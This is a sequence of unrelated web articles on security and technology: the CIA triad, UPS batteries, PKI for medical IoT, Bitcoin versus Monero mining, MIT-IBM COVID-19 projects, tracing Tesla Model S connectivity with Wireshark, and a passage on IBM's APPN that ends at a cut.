When you hear the acronym "CIA", you might think of secret agents and spy movies. But in the world of cybersecurity and compliance, there is another CIA that is very important: the CIA Triad. This stands for Confidentiality, Integrity, and Availability, and it is a security model that helps you protect your organization from digital threats and security breaches. This trio forms the backbone of a robust security model designed to fortify your organization's security infrastructure. In this article, we will discuss each of these components and explain how you can apply them as part of your ISO 27001 compliance journey. What is the CIA Triad? The CIA Triad is a fundamental concept in information security that outlines three core principles: Confidentiality, Integrity, and Availability. These principles serve as a framework for designing, implementing, and evaluating security policies, practices, services, and even products! In the CIA Triad, confidentiality means ensuring that data is only accessible to specifically authorized individuals or systems. You must protect sensitive data from unauthorized access, disclosure, or alteration, whether done with malicious intent or by honest human error. The primary goal of confidentiality is to fortify all data by meticulously controlling and restricting access. Only individuals with an absolute necessity for the information are granted access, ensuring a stringent approach to user permissions. If there's no imperative need, data remains confidential, embodying a proactive stance in safeguarding information from unnecessary exposure or compromise. Integrity focuses on the accuracy and reliability of data. It ensures that information is not tampered with or altered by unauthorized entities. Maintaining data integrity is vital for ensuring the trustworthiness of information, as any unauthorized changes could lead to misinformation or compromised system functionality.
Availability emphasizes the timely and reliable access to information and resources. It ensures that authorized users can access the required data or services when needed. Availability is essential to prevent disruptions in services and maintain the functionality of systems. The CIA Triad is intricately woven into the fabric of the ISO 27001 standard. ISO 27001 is a globally recognized compliance framework for establishing, implementing, maintaining, and continually improving an Information Security Management System (ISMS). Together, the CIA Triad and ISO 27001 create a comprehensive approach to information security, offering organizations a robust framework to safeguard their data against a diverse range of threats and vulnerabilities. Read our article on “What is ISO 27001?” and learn more about this framework and its connection to the CIA Triad. CIA Triad Examples and Use Cases Now that you have a foundational understanding of the CIA Triad's principles—Confidentiality, Integrity, and Availability—you may be eager to explore how these concepts manifest in day-to-day business operations and the specific policies and controls essential for upholding the triad's principles. Let's look at some CIA Triad examples to show the practicality of these pillars. Confidentiality Controls and Use Case Remember, these controls aim to restrict access to sensitive information. Think of tools that verify a user's identity and filter or limit who can access the information and from where (device type and location). Some of these controls are the following: - Data encryption - Data classification and labeling - Access control - Multifactor authentication (MFA) - Strong password policy and management Let's consider the healthcare sector to exemplify the use of a component of access control, RBAC (role-based access control), as a method to guarantee confidentiality.
A healthcare facility may have different roles such as doctors, nurses, administrative staff, and billing specialists. With RBAC, each role can be assigned specific privileges. Doctors may have comprehensive access to patient medical histories, treatment plans, and test results to provide optimal care. Nurses might have access to patient records for administering medications and updating treatment progress. Administrative staff may handle patient scheduling and general record keeping, while billing specialists could access information related to insurance and financial transactions. This way, everyone has access to the information they need to perform their job functions, without unnecessarily risking the patients' data privacy and confidentiality. Integrity Controls and Use Case Integrity is all about keeping data updated and accurate. You should focus on having ways to visualize any changes and verify they are legitimate. If the information is inaccurate, that may mean there has been a security breach. Among the controls for integrity are logging and auditing systems. Consider an e-commerce company that handles a significant number of daily online transactions, including customer purchases, order fulfillment, and payment processing. By implementing robust logging and auditing systems, the e-commerce company can maintain a detailed record of each transaction. This record includes essential information such as the timestamp, user details, and specifics of the purchase. If there is a modification in the order status or a change in payment details, the logging system captures these alterations. In the case of any discrepancies or suspected security breaches, the company can refer to these logs to investigate and verify the legitimacy of changes. This not only enhances the organization's security, but also contributes to a positive user experience. Imagine being a customer who places an important order, only to have it canceled due to a security breach.
If a cybercriminal gained access to the system and manipulated account details, resulting in the loss or transfer of funds, it would be incredibly frustrating. The detailed logs serve as a crucial tool for addressing such situations promptly and effectively, safeguarding both the company and the customer. Availability Controls and Use Case Availability controls focus on ensuring timely and reliable access to information and resources. Businesses implement redundancy strategies, backup systems, and disaster recovery plans to minimize downtime and guarantee continuous service. These are a few other availability controls: - Firewalls and proxy servers - Redundancy strategies - Backup systems - Disaster recovery plans - High availability (HA) clusters - Incident response plans Imagine a financial institution, such as a bank, that heavily relies on digital channels for customer transactions and services. One of the servers hosting the online banking platform experiences a sudden software failure. In this case, redundancy strategies redirect user requests to backup servers, ensuring continuous availability of online banking services. Now you've gained insight into the CIA Triad and know why it forms the bedrock of a resilient security model. Don't leave your organization vulnerable to threats—understand and implement confidentiality, integrity, and availability controls effectively. If you're ready to take the next step towards ISO 27001 compliance, book a meeting with our experts for personalized guidance on securing your information assets.
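The bank failover scenario above can be sketched as a simple health-check loop: try the primary first, then fall back to backups. The server names and health map are hypothetical, and a real deployment would do this in a load balancer or via DNS failover rather than in application code:

```python
def route_request(servers, is_healthy):
    """Return the first healthy server from an ordered list (primary first,
    then backups); a trivial stand-in for a load balancer's health checks."""
    for server in servers:
        if is_healthy(server):
            return server
    # No server is healthy: availability now depends on the DR plan.
    raise RuntimeError("no healthy servers: invoke disaster recovery plan")

# The primary fails; traffic transparently shifts to the first backup.
status = {"primary": False, "backup-1": True, "backup-2": True}
assert route_request(["primary", "backup-1", "backup-2"], status.get) == "backup-1"
```

Ordering the list primary-first keeps traffic on the preferred server whenever it is healthy, so failback after recovery is automatic.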
<urn:uuid:feff925a-3fb5-4ce1-b558-64855e2f0e1e>
CC-MAIN-2024-38
https://www.bemopro.com/cybersecurity-blog/what-is-the-cia-triad
2024-09-11T14:25:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00796.warc.gz
Powering Through Outages: The Vital Role of UPS Batteries in Data Centers In the digital age, where data is the currency of business operations, downtime is not an option. Data centers, the nerve centers of modern organizations, must maintain uninterrupted operations to ensure the seamless flow of information. Enter Uninterruptible Power Supply (UPS) batteries—the unsung heroes that play a pivotal role in safeguarding data centers against power disruptions. In this blog, we delve into the critical role of UPS batteries in data centers and explore how they enable businesses to power through outages with confidence. The Data Center Dilemma Data centers host an intricate ecosystem of servers, storage systems, networking equipment, and more. This bustling digital hub requires a constant and reliable power source to ensure that applications, services, and communications remain uninterrupted. Any power disruption, whether it’s a momentary glitch or a prolonged outage, can lead to financial losses, operational inefficiencies, and reputational damage. Enter the UPS Battery A UPS system acts as a bridge between the primary power source (usually the electrical grid) and the critical IT equipment in a data center. While the primary role of a UPS system is to provide a seamless transition from grid power to backup power during outages, it’s the UPS battery that serves as the lifeblood of this operation. Instantaneous Power Transition When grid power is lost, a UPS battery springs into action instantly, ensuring that critical equipment receives an uninterrupted power supply. This instantaneous transition prevents data loss, application disruptions, and potential hardware damage that can occur due to sudden power fluctuations. Safeguarding Sensitive Electronics Modern data center equipment is highly sensitive to power quality. Fluctuations, surges, and dips in voltage can wreak havoc on servers, storage, and networking gear. 
UPS batteries provide a stable power source, shielding sensitive electronics from potential harm and maintaining optimal performance. Time to Mitigate Generator Start-Up Delays In larger data centers, backup generators are often employed to provide extended power during lengthy outages. However, these generators take time to start up and reach operational capacity. UPS batteries bridge this gap, offering a seamless transition until the generators come online, thus preventing any disruption to operations. Buy Time for Proper Shutdowns In the event of an extended outage, UPS batteries offer valuable time for data center operators to initiate controlled shutdowns of non-essential equipment. This controlled process prevents abrupt shutdowns that can damage hardware or result in data corruption. Protecting Data Integrity Data centers are the repositories of critical information, and sudden power losses can lead to data corruption and loss. UPS batteries ensure that servers have enough power to complete ongoing processes, write cached data to storage systems, and initiate graceful shutdowns, preserving data integrity. Many data centers operate with redundant systems to ensure high availability. UPS batteries add an additional layer of redundancy, ensuring that even if one power source fails, the data center remains operational without any hiccups. In the high-stakes world of data centers, UPS batteries are the unsung champions of reliability, stability, and data protection. Their role in powering through outages goes beyond providing backup energy; they are the ultimate insurance against downtime, enabling data centers to uphold their promise of constant availability. As businesses continue to rely on data-driven operations, investing in robust UPS systems and reliable UPS batteries becomes not just a wise choice, but an indispensable necessity for maintaining business continuity and safeguarding critical digital assets.
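The "buy time" logic described above — ride through on battery if the generator will come online first, otherwise start a controlled shutdown while there is still charge to complete it — can be sketched as a simple decision rule. The function name and the threshold values are illustrative assumptions, not a real UPS management API:

```python
def shutdown_plan(battery_minutes, generator_eta_minutes, graceful_shutdown_minutes):
    """Decide what to do on grid loss, using illustrative thresholds.

    If the battery can outlast the generator start-up, ride through;
    otherwise begin a controlled shutdown while there is still enough
    charge to complete it cleanly."""
    if generator_eta_minutes is not None and battery_minutes > generator_eta_minutes:
        return "ride through on battery until generator is online"
    if battery_minutes > graceful_shutdown_minutes:
        return "begin controlled shutdown of non-essential equipment"
    return "emergency: shed load immediately"

# A site with 12 minutes of battery and a 2-minute generator start-up
# can safely ride through the outage.
print(shutdown_plan(battery_minutes=12, generator_eta_minutes=2,
                    graceful_shutdown_minutes=8))
```

Real estimates of remaining battery runtime vary with load and battery age, which is one reason regular UPS battery testing matters.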
<urn:uuid:7f5df833-79be-4b3e-845b-b6af76c4b904>
CC-MAIN-2024-38
https://www.netlabindia.com/blogs/powering-through-outages-the-vital-role-of-ups-batteries-in-data-centers/
2024-09-11T13:10:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00796.warc.gz
The recent coronavirus pandemic surfaced the need for quality remote healthcare services. Driven by social distancing measures, doctors had to provide medical services to their remote patients without impacting the quality and accuracy of their diagnoses. The proliferation of connected devices in the healthcare industry allowed this connectivity to materialize. Despite the many benefits, improper or weak management of these devices creates an expanding threat landscape that needs to be addressed sooner rather than later to avoid damaging data breaches or attacks against healthcare institutions. The Connected Healthcare Landscape Distance between patient and doctor has been a barrier to the provision of quality healthcare services. Even in today's hyper-connected world, isolated communities lack access to competent connected healthcare. The proliferation of connected healthcare devices promises to put an end to this inequality. There are many types of wearable healthcare devices currently in use, including: - Diagnostic and monitoring devices, such as cardiovascular and glucose monitoring devices - Therapeutic devices, like respiratory or insulin management devices - Rehabilitation devices, such as body motion devices - Lifestyle and fitness trackers Collecting real-time patient data and analytics is revolutionizing the way doctors can monitor and provide their services. Mobile Health (mHealth) and the proliferation of smartphones, apps, and IoT technology have had disruptive impacts on the world of connected health. Mobile, connected healthcare brings enormous benefits for both doctors and patients. Doctors and hospitals can ensure that their patients are taking medications at the prescribed time and amount. Connecting practitioners to their patients remotely can be life-saving – the speed at which a doctor can get to a patient in distress saves lives.
Finally, these technologies remove unnecessary paperwork and bureaucracy, helping cut costs and waste for doctors' offices and hospitals. Threat Landscape is Expanding Besides the obvious clinical benefits, the proliferation of connected medical devices in healthcare brings security risks. The volume of healthcare data being transferred and stored every day can be measured in terabytes — data from IoT and connected medical devices, electronic health records (EHRs), and applications for patients, clinicians, and researchers. The variety of these connected devices introduces novel cybersecurity challenges related to HIPAA compliance and overall information security. According to a recent study, 63% of healthcare organizations experienced a security incident related to unmanaged and IoT devices in the past two years. - Infusion and insulin pumps are vulnerable because of their connectivity capabilities, and NIST has published guidance to secure wireless infusion pumps in healthcare organizations. - Researchers discovered a simple denial-of-service attack against pacemakers that has the potential to kill. - Wearable devices transmitting heart rate, blood sugar, and other vitals via Bluetooth can be exposed to cyber-attacks. - Thermometers used for measuring employee temperature as a precautionary measure against COVID-19 can also be hacked, exposing sensitive data. PKI Can Secure Connected Medical Devices To protect patient data and secure healthcare organizations against cyber-attacks, these entities need to develop a robust security strategy that is based on the ability to effectively identify all connected devices. Identity authentication is the most effective way to reduce risks associated with exchanging information between medical devices. This is where Public Key Infrastructure (PKI) comes in handy. PKI is a well-established solution that provides encryption and authentication to any type of connected device and offers numerous advantages.
PKI enables identity assurance while digital certificates validate the identity of the connected device. With PKI, IoT devices can be authenticated across systems. A robust PKI, where certificate lifecycle management follows well-established policies and practices, is not vulnerable to common brute force or man-in-the-middle attacks targeting the precious medical data. At the same time, PKI encrypts sensitive information while in transit, protecting it from malicious actors even in the event of a data breach or compromise. As such, PKI supports HIPAA compliance. The HIPAA Security Rule dictates that healthcare entities must implement safeguards, such as encryption, that render electronic Protected Health Information (ePHI) “unreadable, undecipherable or unusable” so any “acquired healthcare or payment information is of no use to an unauthorized third party.” In addition to meeting HIPAA compliance, PKI is scalable enough to secure heterogeneous connected medical device environments, which vary in size, complexity, and security needs. Certificate Lifecycle Management is Critical As we have noted before, connected device authentication and encryption rely on an effective certificate lifecycle management program. With the number of connected devices exploding, the associated digital identities explode in number as well. Healthcare organizations need to be able to manage these identities effectively and efficiently to ensure that the corresponding certificates do not expire and cause damaging outages. Digital certificates ensure the integrity of healthcare data and device communications through encryption and authentication, ensuring that transmitted data are genuine and have not been altered or tampered with. This is essential since, according to a recent report, 73% of healthcare organizations experience unplanned downtime and outages due to mismanaged digital certificates and public key infrastructure.
As a result of poor certificate management practices, 55% of surveyed organizations have experienced four or more certificate-related outages in the past two years alone. The main reason for the weak certificate management is a lack of visibility: 74% of healthcare organizations do not know how many keys and certificates they have, where to find them, or when they expire. How the AppViewX Platform Helps With the proliferation of connected medical devices and their digital identities, it is important to understand that manual discovery of keys and certificates is no longer an option. Manual certificate management is an error-prone and time-consuming process which creates a false sense of security, leaving healthcare organizations open to vulnerabilities and devastating cyber-attacks. It is essential that organizations automate and centralize their PKI to minimize the risk of certificate-related outages and data breaches. The AppViewX platform helps organizations reinforce their IoT PKI strategies. It helps manage and automate every step of the implementation cycle – from multi-vendor certificate enrolment, to revocation, monitoring, and end device provisioning. It's all your organization needs to stay secure and compliant, while scaling upward and enforcing cryptography across the network. You can either request a demo or contact our experts to learn more.
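The visibility problem above — not knowing which certificates expire when — is the kind of check that certificate lifecycle tooling automates. A minimal sketch of the idea follows; the inventory format and the hostnames are hypothetical, and a real system would read the notAfter field from the actual X.509 certificates rather than a hand-maintained list:

```python
from datetime import datetime, timedelta

def expiring_soon(inventory, now, window_days=30):
    """Return certificates that expire within `window_days`, sorted soonest
    first. `inventory` is a hypothetical list of (name, not_after) pairs."""
    horizon = now + timedelta(days=window_days)
    at_risk = [(name, not_after) for name, not_after in inventory
               if not_after <= horizon]
    return sorted(at_risk, key=lambda item: item[1])

inventory = [
    ("portal.example-hospital.org", datetime(2024, 7, 1)),
    ("infusion-pump-fleet", datetime(2024, 6, 10)),
    ("ehr-api.example-hospital.org", datetime(2025, 1, 15)),
]
# The pump-fleet and portal certificates fall inside the 30-day window.
for name, not_after in expiring_soon(inventory, now=datetime(2024, 6, 1)):
    print(f"renew {name} before {not_after:%Y-%m-%d}")
```

Sorting soonest-first lets the renewal queue double as a priority list, which is the core of avoiding certificate-related outages.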
<urn:uuid:2e2d5234-4ade-4389-8cea-0c83e1b26ff8>
CC-MAIN-2024-38
https://www.appviewx.com/blogs/why-encryption-is-critical-to-the-healthcare-industry/
2024-09-14T02:00:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00596.warc.gz
Ever wondered why websites that are mining in the background don't mine for the immensely hot Bitcoin, but for Monero instead? We can explain that. As there are different types of cryptocurrencies, there are also different types of mining. After providing you with some background information about blockchain and cryptocurrency, we'll explain how the mining aspect of Bitcoin works, and how others differ. Cryptocurrency miners are in a race to solve a mathematical puzzle, and the first one to solve it (and get it approved by the nodes) gets the reward. This method of mining is called the Proof-of-Work method. But what exactly is this mathematical puzzle? And what does the Proof-of-Work method involve? To explain this, we need to show you which stages are involved in the mining process: - Verify if transactions are valid. Transactions contain the following information: source, amount, destination, and signature. - Bundle the valid transactions in a block. - Get the hash that was assigned to the previous block. - Solve the Proof-of-Work problem (see below for details). The Proof-of-Work problem is as follows: the miners look for a SHA-256 hash that has to match a certain format (target value). The hash will be based on: - The block number they are currently mining. - The content of the block, which in Bitcoin is the set of valid transactions that were not in any of the former blocks. - The hash of the previous block. - The nonce, which is the variable part of the puzzle. The miners try different nonces to find one that results in a hash under the target value. So, based on the information gathered and provided, the miners race against each other to try and find a nonce that results in a hash that matches the prescribed format. The target value is designed so that the estimated time for someone to mine a block successfully is around 10 minutes (at the moment).
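The nonce search described above can be sketched in a few lines of Python. This is a simplified illustration: real Bitcoin mining double-hashes an 80-byte binary block header and compares the result against a full 256-bit target, whereas here we hash a string and use a leading-zero prefix as the target:

```python
import hashlib

def mine(block_number, transactions, previous_hash, difficulty=4):
    """Search for a nonce whose SHA-256 hex digest starts with
    `difficulty` zeroes — a toy stand-in for Bitcoin's 256-bit target."""
    prefix = "0" * difficulty
    nonce = 0
    while True:
        payload = f"{block_number}{transactions}{previous_hash}{nonce}".encode()
        digest = hashlib.sha256(payload).hexdigest()
        if digest.startswith(prefix):
            return nonce, digest
        nonce += 1  # the nonce is the only part the miner varies

nonce, digest = mine(
    497542, "alice->bob:1.5",
    "00000000000000000088cece59872a04457d0b613fe1d119d9467062e57987f1")
print(f"found nonce {nonce} -> {digest}")
```

Each extra required zero multiplies the expected number of attempts by 16, which is how the network tunes difficulty to keep block times near 10 minutes.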
If you look at BlockExplorer.com, for example, you will notice that every BlockHash is 64 hexadecimal digits (256 bits) long and, at the time of writing, starts with 18 zeroes. For example, the BlockHash for Block #497542 equals 00000000000000000088cece59872a04457d0b613fe1d119d9467062e57987f1. This is the current target—the value of the hash has to be so low that the first 18 digits are zeroes. So, basically, miners have some fixed input and start trying different nonces (which must be an integer), and then calculate whether the resulting hash is under the target value. Bitcoin addresses are not tied directly to real-world identities, but every transaction between them is public. Therefore we call Bitcoin “pseudonymous.” This means you may or may not know the name of the person behind an address, but you can track every payment to and from that address if you want. There are ways to obfuscate your traffic, but they are difficult, costly, and time-consuming. Monero, however, has always-on privacy features applied to its transactions. When someone sends you Monero, you can't tell who sent it to you. And when you send Monero to someone else, the recipient won't know it was you unless you tell them. And because you don't know their wallet address and you can't backtrack their transactions, you can't find out how “rich” they are. Transactions inside a Bitcoin block, by contrast, are an open book. Monero mining does not depend on heavily specialized, application-specific integrated circuits (ASICs), but can be done with any CPU or GPU. With ASICs dominating, it is almost pointless for an ordinary computer to participate in the mining process for Bitcoin. The Monero mining algorithm does not favor ASICs, because it was designed to attract more “little” nodes rather than rely on a few farms and mining pools. There are more differences that lend themselves to Monero's popularity among behind-the-scenes miners, like the adaptable block size, which means your transactions do not have to wait until they fit into a later block. The main Bitcoin blockchain has a 1 MB block cap, whereas Monero blocks do not have a fixed size limit.
So Bitcoin transactions will sometimes have to wait longer, especially when the transaction fees are low. The advantages of Monero over Bitcoin for threat actors or website owners are mainly that: - It's untraceable. - It can make faster transactions (especially when they are small). - It can use “normal” computers effectively for mining. For those of you looking for more information on the technical aspects of this subject, we recommend:
<urn:uuid:3ebaf6a4-06b5-4375-aaf9-e3b413a6bdc6>
CC-MAIN-2024-38
https://www.malwarebytes.com/blog/news/2017/12/how-cryptocurrency-mining-works-bitcoin-vs-monero
2024-09-13T23:53:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00596.warc.gz
From risk assessment to finding cures for chronic diseases, artificial intelligence is helping the healthcare industry gain deeper insights into treatment variability, care processes, diagnostics, and patient outcomes. Considering the huge potential of AI and machine learning (ML) across the care continuum, healthcare researchers have, from time to time, funded various projects that transformed the healthcare ecosystem. Currently, as the world is amidst a life-threatening and rapidly spreading pandemic, the MIT-IBM Watson AI Lab has come forward to fund ten high-potential AI projects that aim to combat the economic and health consequences of COVID-19. Here is a list of those ten AI projects: Project 1: Early Detection of Sepsis in COVID-19 Patients During the ongoing pandemic, 10% of COVID-19 patients have been diagnosed with sepsis within a week of showing symptoms, and only half of them survived it. If sepsis can be identified early and the patient is put on intensive care at the hospital, the chance of survival may increase. That is why MIT Professor Daniela Rus is leading a project along with other researchers to leverage artificial intelligence (AI) in developing a machine learning system that will analyze patients' white blood cell images to detect signs of an activated immune response. Project 2: Designing Proteins to Block SARS-CoV-2 In an effort to defeat the coronavirus, MIT professors Benedetto Marelli and Markus Buehler are leading a project that uses a protein-folding method to block the coronavirus from binding to the host's cells. The method is similar to one they earlier used in the lab with silk protein, which they found could double the shelf life of perishable foods. Project 3: Saving Lives as the U.S. Economy Restarts Even though the coronavirus is still present, businesses in some U.S. states are reopening.
Therefore, to limit further spread of COVID-19 amidst the economic restart, MIT professors Simon Johnson, Daron Acemoglu, and Asu Ozdaglar are leading a project that uses artificial intelligence models to analyze and study variable lockdown strategies and their possible impact on public health and the economy. Project 4: Determining Which Materials Are Effective in Protecting Mask Wearers While wearing a face mask is mandatory to prevent the coronavirus's spread, there is no standardized method for evaluating many masks. Apart from N95 masks, there is a variety of masks available on the market, but no mechanism is in place to evaluate them. That is why researchers on a project led by Lydia Bourouiba, an MIT Associate Professor, are developing a precise set of methods to evaluate homemade and medical-grade masks' effectiveness in blocking droplets of saliva and mucus released during sneezing, coughing, and breathing. Project 5: Use of Repurposed Drugs to Treat COVID-19 The project that aims to find a cure among already-approved drugs is led by Rafael Gomez-Bombarelli, an MIT Assistant Professor, and his team of researchers. They are trying to represent molecules in three dimensions to extract spatial information that can be used to identify effective drugs for combating the coronavirus. As part of their project, they will use the U.S. Department of Energy's NERSC and NASA's Ames supercomputers to expedite the screening process using machine learning. Project 6: Use of Automated Contact Tracing COVID-19 is spreading like wildfire, and limiting the spread is essential. For this, health departments need to trace people who might have come into contact with infected patients. That is why MIT researchers Ronald Rivest and Daniel Weitzner, in collaboration with MIT Lincoln Laboratory and others, are working towards using encrypted Bluetooth data to trace contacts while keeping identifiable information safe and secure.
Project 7: Ensuring Global Access to a Coronavirus Vaccine

We are all aware that only a vaccine can help fight COVID-19. However, what remains a challenge is the equal and rapid distribution of vaccines globally. Addressing the possible manufacturing and supply challenges, MIT professors Anthony Sinskey and Stacy Springs are leading a project with other researchers that aims to build data-driven statistical models to make informed decisions and make the vaccine accessible to the world in a cost-effective way.

Project 8: Leveraging Electronic Medical Records (EMR) to Find a COVID-19 Cure

Already in the US, the antiviral drug remdesivir, which was developed for Ebola treatment, is being clinically tested to check its potential as a COVID-19 treatment. Following a similar strategy, MIT professors Roy Welsch and Stan Finkelstein are using ML, statistics, and simulated clinical trials to analyze millions of electronic medical records to see if any already-approved drugs can be reused against COVID-19.

Project 9: Finding Better Ways to Treat COVID-19 Patients on Ventilators

As the COVID-19 patient count increases, there is a shortage of mechanical ventilators. Together with IBM researchers Daby Sow and Zach Shahn, MIT researchers Li-Wei Lehman and Roger Mark are using AI, COVID-19 patient data from a local Boston hospital, and data on intensive-care patients with acute respiratory distress syndrome. They will develop a tool to help doctors identify the right ventilator settings for infected patients and determine the right duration for which patients should be kept on the machine. In this way, they hope to limit the lung damage that mechanical ventilation itself can cause.
Project 10: Bringing the World Back to Normal with Targeted Lockdowns, Personalized Treatments, and Mass Testing

In the first phase of a project led by MIT Professor Dimitris Bertsimas, his group of researchers plans to study the impact of lockdowns and other government measures formulated to prevent new infection cases and deaths. In the second phase, they will build ML models to predict the vulnerability of patients to COVID-19 and what kind of personalized treatment will prove effective for them. They also plan to develop a spectroscopy-based test for COVID-19 that will be inexpensive and deliver results in minutes. For the project, data will be fetched from four hospitals in Europe and the US.
Source: https://www.mytechmag.com/10-mit-ibm-watson-ai-lab-funded-projects-to-fight-against-covid-19/
IoT: Tesla Model S Remote Control (by Jonathan Whiteside, Darrin Roach and Paul Offord)

With the proliferation and expansion of wireless technologies, it is now becoming commonplace for vehicles to be connected to the Internet for numerous reasons, such as website access, telematics and always-connected emergency services. Tesla Motors is very much at the forefront of the 'Connected Vehicle' revolution, producing vehicles with 'always on' connectivity through 4G LTE and WiFi. This gives the driver features such as Google Maps navigation, web access and Spotify. It also allows remote operation features such as climate control and charge port opening/closing, as well as providing an instant view of battery charge levels. All these features can be readily accessed from a mobile phone app or desktop app on a PC.

The objective of this experiment was to learn more about connected vehicle technology by tracing the data flows between a desktop PC app called Tesla Control (shown above), the Tesla Cloud Services and a Tesla Model S. We also feel that a basic knowledge of the vehicle's connectivity may help others troubleshoot problems. We wanted to determine if it was possible to trace some of the control features in action, using equipment and hardware that was easily available; in other words, using no specialised equipment.

The following diagram shows how the components of the test were logically connected:

Tracing interactions between the Tesla Control app and the Tesla Cloud Services is easily achieved using Wireshark. Tracing interactions between the Tesla Cloud Services and the vehicle is trickier. On the road, a Tesla vehicle is constantly connected to the Internet and Tesla Cloud Services via a 4G LTE data connection, and we had no way to trace this connection. The Tesla vehicle has an option to connect to the Internet via WiFi, rather than use 4G LTE, and this provided a way for us to trace the vehicle-cloud interactions.
A further problem was that our office is on the third floor of a glass and steel building with silvered windows. Despite parking the Model S in various bays in the office car park, it was not possible to obtain a consistently good WiFi signal from the vehicle to our office Access Point. To overcome this, we set about designing a portable solution that we could use in the office car park, or from within the vehicle itself.

Standard off-the-shelf items were used for these tests, with no enhancements, and some minor configuration changes made to ensure the intended operation. A 2017 Tesla Model S was available for testing. The equipment/software used was as follows:

- Dell XPS 15 9560 laptop with Windows 10.
- Dell DA200 USB-C to HDMI/VGA/Ethernet/USB 3.0 adapter.
- TP-Link TL-WR702N (chosen as it can be powered easily from a USB port).
- Samsung Galaxy S7.
- Tesla Control (from the Microsoft Store; the owner's permission and credentials were provided).

Note, this is the equipment that we had to hand, and it should be possible to replicate the tests with any similar equipment. The equipment was configured as follows:

- A WiFi hotspot was configured on the phone. This provided Internet and DHCP services.
- The laptop WiFi was connected to the WiFi hotspot of the phone.
- The laptop WiFi connection was configured to share its internet connection with the Ethernet connection of the DA200.
- The TP-Link TL-WR702N was connected to the Ethernet port of the DA200 and powered from the DA200's USB port.
- DHCP was disabled on the TP-Link TL-WR702N, since the phone would automatically provide this.
- The vehicle was connected to the TP-Link TL-WR702N using WiFi.

All equipment was battery powered or powered from USB connections for maximum portability. The following image shows the actual configuration of the laptop and other components used for our tests:

In this configuration the laptop performed two roles:

- As a host for the Tesla Control app that communicated with the Tesla Cloud Service.
- As a router for traffic flowing from the Tesla Cloud Service to the vehicle.

The flow of data was:

- A command from the Tesla Control app flows from the laptop, via the Samsung Galaxy S7 and the Internet, to the Tesla Cloud Service.
- A matching command would flow from the cloud service, through the Internet, through the Samsung Galaxy S7, through the laptop, through the TP-Link unit and to the vehicle.
- Responses would flow in the reverse direction across the same two paths.

This configuration closely matched the logical configuration, using WiFi rather than LTE, and allowed us to capture app-to-cloud packets and cloud-to-car packets on a single laptop using Wireshark. The trace configuration was:

- Capture on the laptop WiFi interface to trace the Tesla Control app to cloud service flows.
- Capture on the USB Ethernet interface to trace the Tesla Cloud Service to vehicle flows.

Two separate instances of Wireshark were used for capture; one instance for each interface.

Get the full paper, which details the test method and findings, from https://community.tribelab.com/mod/resource/view.php?id=722. The paper is freely available to community members - just login and click the link. If you are not a TribeLab member, sign up here - it only takes seconds and is totally free.
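As a flavour of the post-capture analysis such traces allow, here is a minimal sketch that tallies conversations from packets reduced to (source, destination) address pairs, for instance exported from Wireshark as CSV. The pair representation and the addresses below are our simplification for illustration, not part of the published method:

```python
from collections import Counter

def top_talkers(packets):
    # packets: iterable of (src_ip, dst_ip) pairs from a capture.
    # Sorting each pair makes the count direction-agnostic, so request
    # and response packets land in the same conversation bucket.
    conversations = Counter(tuple(sorted(p)) for p in packets)
    return conversations.most_common()
```

Run over both captures, this kind of tally quickly surfaces the cloud endpoint that both the app flow and the vehicle flow talk to.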
Source: https://www.networkdatapedia.com/post/2018/12/16/iot-tesla-model-s-remote-control-by-jonathan-whiteside-darrin-roach-and-paul-offord
In the annals of networking, IBM's Advanced Peer-to-Peer Networking (APPN) stands as a monumental shift in the design and implementation of network architectures. Emerging as the successor to the Systems Network Architecture (SNA), APPN revolutionized how network resources could be utilized and managed. It broke away from the centralized, hierarchical model of its predecessor, offering instead a more flexible, dynamic, and scalable solution. As with many technologies, time and innovation have rendered APPN less prominent, but its impact on the networking landscape is indelible. In this article, we will explore the genesis, core principles, and mechanics of APPN, trace its evolution over time, and evaluate its legacy in today's networking paradigms.

- Introduction to Advanced Peer-to-Peer Networking (APPN)
- Core Principles of APPN
- Technical Details of APPN
- Evolution and Adaptations of APPN
- The Decline and Legacy of APPN
- Conclusion: APPN in Retrospect

1. Introduction to Advanced Peer-to-Peer Networking (APPN)

Advanced Peer-to-Peer Networking, commonly abbreviated as APPN, is a networking architecture developed by IBM as an extension and successor to their Systems Network Architecture (SNA). APPN was designed to address some of the limitations of SNA, notably its rigid, hierarchical design and reliance on centrally managed resources. The primary objective of APPN was to enable more efficient, flexible networking by leveraging dynamic routing and decentralized control.

Departure from SNA

In contrast to SNA's hierarchical model, APPN adopted a peer-to-peer approach. This marked a significant departure in how network nodes interacted with each other. Rather than funneling all communications through a central hub, as was common in SNA, APPN allowed for more direct, node-to-node communication.
This not only improved network efficiency but also offered better scalability and adaptability, as nodes could join or leave the network with minimal disruption to network operations.

2. Core Principles of APPN

One of the most significant advancements brought about by APPN was its use of dynamic routing. Unlike SNA, which used static routes defined by network administrators, APPN allowed network nodes to discover the most efficient paths for data transmission dynamically. This was accomplished through sophisticated routing algorithms that continually assessed the network state, making real-time adjustments as needed.

APPN further distinguished itself from its predecessor through its decentralized control mechanism. In SNA, a central controller – often a mainframe – managed resource allocation and routing decisions. APPN, on the other hand, distributed these responsibilities across multiple nodes in the network. This made the network more resilient to single points of failure and also allowed for more granular control over network resources.

Through these core principles, APPN made significant strides over SNA, addressing many of the limitations that had constrained earlier networking architectures. The shift towards dynamic routing and decentralized control not only improved the efficiency and reliability of network operations but also laid the groundwork for future advancements in networking technology.

3. Technical Details of APPN

APPN operates over a layered architecture, closely aligning with the OSI model. The architecture incorporates application, presentation, session, transport, network, data link, and physical layers. Each layer has its own set of responsibilities, from managing data flow and routing information to handling error detection and recovery. The integration of these layers provided a modular and flexible framework, making it easier to adapt APPN to various hardware and software configurations.
APPN supported multiple types of network topologies, including ring, star, and mesh configurations. However, what set it apart was its ability to adapt to changing topological structures dynamically. Nodes could join or leave, and the network would automatically update its routing tables. This adaptive feature reduced the administrative burden and allowed for seamless network expansion or contraction, further promoting scalability and adaptability.

4. Evolution and Adaptations of APPN

Integration with Other Technologies

